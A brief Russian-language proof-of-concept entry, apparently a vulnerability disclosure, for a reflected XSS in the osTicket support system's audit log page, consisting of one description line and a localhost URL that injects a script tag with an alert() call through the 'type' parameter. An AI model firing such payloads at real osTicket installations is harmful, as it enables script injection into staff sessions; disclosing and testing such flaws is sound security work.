
Эксплойт proof-of-concept для отражённой XSS в системе поддержки тикетов osTicket, демонстрирующий инъекцию через параметры журнала аудита.
Отражённая XSS
http://localhost/scp/audits.php?startData=&endDate=&type="><script>alert('reflectedXSS')</script>